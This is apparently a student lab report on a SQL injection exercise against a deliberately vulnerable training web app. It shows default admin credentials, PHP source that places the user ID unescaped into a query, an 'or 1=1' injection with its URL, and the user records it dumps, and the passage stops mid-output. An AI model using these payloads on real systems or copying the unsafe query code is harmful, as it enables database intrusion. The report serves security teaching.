信息安全实验 SQL Injection
一.实验内容
1.Finish all six challenge on the website,or give the reason why the protection is unbreakable(need an experiment report ).
2(Extended work).Tell me why [input = a’ or ‘1=1’ or ‘1=1] doesn’t work on the login website in your experiment report.
二.实验过程
- 登陆实验网页:http://202.38.79.49:8888/login.php
登陆界面如下:
- 尝试输入默认用户名和用户密码:
Username: admin
Password: admin - 成功登入系统!系统界面如下:
1.设置安全等级为1:Security Level = 1.
注入界面如下:
- 点击右下角的
View Source
,查看PHP连接后台数据库的源代码:
<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>
- 根据以上代码可知,可以利用
$id
变量的漏洞进行sql注入,向User ID
文本框中输入查询字符串1=1 or 1=1
,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit
,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin
ID: 1=1 or 1=1
First name: Gordon
Surname: Brown
ID: 1=1 or 1=1
First name: Hack
Surname: Me
ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso
ID: